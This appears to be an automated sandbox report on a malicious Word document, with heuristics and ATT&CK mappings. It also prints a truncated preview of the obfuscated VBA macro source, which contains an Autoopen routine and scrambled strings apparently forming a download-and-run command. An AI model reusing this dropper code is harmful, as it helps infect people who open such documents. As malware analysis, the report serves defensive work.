Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is an OLE document containing VBA macros, including an AutoOpen macro and a Shell() call, indicating malicious intent. The AutoOpen macro likely executes a command to download and run a second-stage payload. The presence of these elements strongly suggests a macro-based malware delivery mechanism.
Heuristics (5)
- VBA macros detected (severity: medium, 2 related findings), OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA (severity: critical), OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro (severity: high), OLE_VBA_AUTOOPEN: AutoOpen macro
- Legacy WordBasic auto-exec macro marker (severity: medium), OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (severity: info), EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 170021 bytes |

SHA-256: 49a0ef5708f101c047f47fbc3e51f0f5ba02b7225ff3853a4eec5cdbcc1d4c91
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "hpfHKjPXp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub jGGwBE(VkNnQ)
QjJjYl = FbDhK
JRMEVM = (GBaRL / RaIEG / 38724 / Fix(kwwRzB)) + 48248 - CLng(oEDYn + CLng(42293)) + EJfsbC + 72605 * IrVTT - CStr(75072) / XwNRuL / CLng(uHTnu)
End Sub
Sub wXsXj(WzYOt)
zjpach = jrhHL
bkkOX = (nHTTl / zkzQww / 64901 / Fix(avcdU)) + 60147 - CLng(iNbOPh + CLng(2614)) + llkBp + 10502 * fPEbiz - CStr(14914) / tjZrv / CLng(IHtsmF)
sFVRwc = iNzrO
PMYsBp = (ziiqpF / dirIDA / 78892 / Fix(KjKhUw)) + 71883 - CLng(mhdDRv + CLng(65787)) + rziwK + 50956 * cqBhzV - CStr(78319) / OCbBpi / CLng(UiMCr)
LCKiw = QGVsdk
hrSOl = (ztOBp / sSYcAk / 15056 / Fix(WQorzD)) + 60234 - CLng(itKwR + CLng(72855)) + cCQas + 88706 * zAUnE - CStr(46877) / dUHVBj / CLng(CaOii)
End Sub
Sub LVrrcG(vZkJP)
HToWMz = fEYCc
EjabB = (NUDbJd / zGzDk / 95927 / Fix(NZwOE)) + 4661 - CLng(XvGzpO + CLng(25794)) + iVwiR + 4483 * ErfsB - CStr(3414) / hAnEW / CLng(fkLXz)
pZwdT = zvYbF
jDtVG = (LBjXNG / krLVz / 19167 / Fix(jHMvHO)) + 21641 - CLng(DFbGul + CLng(45672)) + JKicM + 96187 * RLqTjX - CStr(73496) / aRiSZ / CLng(zNsXiz)
End Sub
Sub Autoopen()
On Error Resume Next
wGLXMZ = LThOl
vjQucF = (fAoQT / bLzmEi / 1242 / Fix(VEivW)) + 96650 - CLng(OHkPjv + CLng(92054)) + wzvcf + 90440 * SvEOzq - CStr(27120) / dkkcZi / CLng(wFHhRt)
SAwhUtPwjfCHz (AmDjw + RcbHlVqOdnITo + oIBUG)
mirHA = AZGfvS
kKwpU = (dBNvRL / tNtUi / 30733 / Fix(zrDHw)) + 12894 - CLng(QUzVqk + CLng(18757)) + ppShW + 56028 * ZnZvj - CStr(99173) / jmwfzW / CLng(GrrNKN)
End Sub
Sub PaabHh(DBBts)
SQhCXo = nLZKmn
jwbTL = (qJMzU / RPckum / 10613 / Fix(aqKoqW)) + 68559 - CLng(EBPpUO + CLng(77906)) + ahhcl + 18191 * iiuWO - CStr(20734) / iYjstt / CLng(mcpjwE)
jfHDa = JMEdJ
mcGvz = (jdWrI / UvRoEr / 92573 / Fix(FswDnS)) + 77040 - CLng(QRTDic + CLng(12564)) + jhpLN + 50930 * sXfjfG - CStr(41983) / NhULu / CLng(DIhjwM)
XEtso = HXClb
DGjHjI = (vJGWNQ / icYIi / 32736 / Fix(jUSmq)) + 81219 - CLng(NkKws + CLng(63712)) + XXBwYP + 34335 * RhfbcX - CStr(60019) / tGKRUl / CLng(VsSjh)
End Sub
Sub vaVjV(FXKGC)
nDkGON = ilRphQ
mJfFF = (kWVHKs / MZcjA / 17164 / Fix(hhcPd)) + 9848 - CLng(wniln + CLng(37496)) + YvrEA + 36966 * QhdvW - CStr(12933) / IJhoY / CLng(oEhQbA)
End Sub
Attribute VB_Name = "mirVXYGnikf"
Sub pKQAz(Gwlpi)
wOYLUO = cAmYhq
Ywzdi = (CojkX / hzVBv / 93105 / Fix(uYIzv)) + 38006 - CLng(KCzCl + CLng(66991)) + ruIwH + 21429 * uIfon - CStr(29872) / dHwrcd / CLng(iPwEJO)
End Sub
Function RcbHlVqOdnITo()
On Error Resume Next
zojwo = qCMDnl
zQdLHE = (hvALIE / IiKtz / 93235 / Fix(vTwpzU)) + 81668 - CLng(vvDrjw + CLng(35692)) + nzFfjE + 77111 * pjjhX - CStr(3792) / qoEEw / CLng(VIjsGz)
Gzrkm = MNNPv
YpGwSr = (NbIPYD / GPEaKD / 80129 / Fix(jKYoin)) + 41379 - CLng(HbmvFR + CLng(97337)) + sdUqlw + 70269 * jwvwJ - CStr(75181) / sIwFv / CLng(dIwsm)
BcjTZmI = fOGhk("aO9+cC9efFG+cC9+cC9fFcC9+c'+'C9GnfFG(& = dscC9+cC9adasncC9+cC9kKWcC9((()cC9cC9niOj-cC9xcC9+]3,1[)(GNiRTSOt.eClm.h", 88298 + 5 - 88298, 88298 + 107 - 88298)
nmIip = Zihjz
laFIks = (fUWtn / LCFPU / 40600 / Fix(zzzhYQ)) + 11513 - CLng(kFYJIJ + CLng(38108)) + TVYGT + 13596 * QsUadO - CStr(38215) / MOApo / CLng(YjUmsv)
vlVIwL = ZJwjn
TUzZsp = (aERRX / DSSUsv / 31400 / Fix(tkJEsj)) + 3068 - CLng(kFzMj + CLng(24478)) + OQrtvT + 81923 * EkOHn - CStr(14516) / GkXmZj / CLng(VzIPKU)
vuKoEzVcJ = fOGhk("O0BcC9pcC'+'9+cC9xcC9+cC92cC9+cC9rtScC9+cC9oT7cC9+cC9DhcC9+cC9.cfsakcC9+cC9KcC9+cC9W(cC9+cC97ohfU", 29573 + 5 - 29573, 29573 + 90 - 29573)
SKwrZ = EACUZ
QETiZ = (JvzOo / nJZurl / 60877 / Fix(WIlZP)) + 30754 - CLng(DkFiC + CLng(23956)) + TjBVj + 3482 * YNDWB - CStr(7812) / iJJQp / CLng(jITtO)
bKUvYX = KIDCmH
jRGbzP = (XJKcMv / fZljw / 95830 / Fix(aWEZiw)) + 49731 - CLng(KWCSjs + CLng(37793)) + AczHE + 1372 * TLcUi - CStr(68326) / SpJLG / CLng(BCUTDi)
WHSbuuZbiM = fOGhk("7qZC9fFcC9+cC9G+cC9+cC9fc'+'C9+cC9FGx'+'e.fFG(
... (truncated)